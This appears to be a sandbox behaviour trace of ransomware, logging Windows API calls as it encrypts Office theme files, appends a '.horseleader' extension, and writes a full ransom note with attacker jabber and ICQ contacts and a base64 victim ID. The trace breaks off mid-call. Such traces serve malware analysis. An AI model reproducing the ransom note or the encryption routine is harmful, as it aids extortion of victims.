[0247.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.637] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF") returned 77 [0247.637] StrStrW (lpFirst="RADIAL.INF", lpSrch=".txt") returned 0x0 [0247.637] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=586) returned 1 [0247.637] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x24a, lpOverlapped=0x0) returned 1 [0247.638] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.638] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x24a, lpOverlapped=0x0) returned 1 [0247.638] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.638] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.639] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.639] CloseHandle (hObject=0x1a4) returned 1 [0247.639] GetProcessHeap () returned 0x780000 [0247.639] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.639] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF.horseleader") returned 89 [0247.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.inf.horseleader")) returned 1 [0247.642] GetProcessHeap () returned 0x780000 [0247.642] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.642] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c6b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.642] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.642] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 79 [0247.642] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.642] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.642] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.642] lstrlenW (lpString=".testttjffg") returned 11 [0247.642] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.642] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.642] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.643] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.643] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 79 [0247.643] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.643] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=19563) returned 1 [0247.643] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4c6b, lpOverlapped=0x0) returned 1 [0247.645] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb395, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.645] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4c6b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4c6b, lpOverlapped=0x0) returned 1 [0247.646] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.646] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.646] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.646] CloseHandle (hObject=0x1a4) returned 1 [0247.647] GetProcessHeap () returned 0x780000 [0247.647] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.647] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.horseleader") returned 91 [0247.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.horseleader")) returned 1 [0247.648] GetProcessHeap () returned 0x780000 [0247.648] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.648] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c6b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.648] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.648] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\#Decrypt#.txt") returned 80 [0247.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.649] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.649] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.650] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.650] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.650] CloseHandle (hObject=0x158) returned 1 [0247.651] GetProcessHeap () returned 0x780000 [0247.651] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.651] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="REFINED", cAlternateFileName="")) returned 1 [0247.651] lstrcmpiW (lpString1="REFINED", lpString2="Windows") returned -1 [0247.651] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED") returned 67 [0247.651] lstrcmpW (lpString1="REFINED", lpString2=".") returned 1 [0247.651] lstrcmpW (lpString1="REFINED", lpString2="..") returned 1 [0247.651] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.651] GetProcessHeap () returned 0x780000 [0247.651] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.651] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*") returned 69 [0247.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.652] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.652] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\.") returned 69 [0247.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.652] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.652] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.652] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\..") returned 70 [0247.653] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.653] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.653] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x58f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.653] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.653] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 79 [0247.653] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.653] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.653] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.653] lstrlenW (lpString=".testttjffg") returned 11 [0247.653] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.653] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.653] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.654] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 79 [0247.654] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.654] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1423) returned 1 [0247.654] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x58f, lpOverlapped=0x0) returned 1 [0247.656] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.656] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x58f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x58f, lpOverlapped=0x0) returned 1 [0247.657] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.657] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.657] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.657] CloseHandle (hObject=0x1a4) returned 1 [0247.657] GetProcessHeap () returned 0x780000 [0247.657] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.657] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.horseleader") returned 91 [0247.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.horseleader")) returned 1 [0247.659] GetProcessHeap () returned 0x780000 [0247.659] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.659] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9f100, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ec9f100, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xb30e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="REFINED.ELM", cAlternateFileName="")) returned 1 [0247.659] lstrcmpiW (lpString1="REFINED.ELM", lpString2="Windows") returned -1 [0247.659] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM") returned 79 [0247.659] StrStrIW (lpFirst="REFINED.ELM", lpSrch=".horseleader") returned 0x0 [0247.659] lstrcmpW (lpString1="REFINED.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.659] lstrcmpW (lpString1="REFINED.ELM", lpString2="_uninstalling_.png") returned 1 [0247.659] lstrlenW (lpString=".testttjffg") returned 11 [0247.659] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM", lpSrch=".testttjffg") returned 0x0 [0247.659] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.660] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM") returned 79 [0247.660] StrStrW (lpFirst="REFINED.ELM", lpSrch=".txt") returned 0x0 [0247.660] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=45838) returned 1 [0247.661] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.663] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.664] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.664] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.664] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.665] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x130e, lpOverlapped=0x0) returned 1 [0247.665] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffecf2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x130e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x130e, lpOverlapped=0x0) returned 1 [0247.665] SetFilePointerEx (in: hFile=0x1a4, 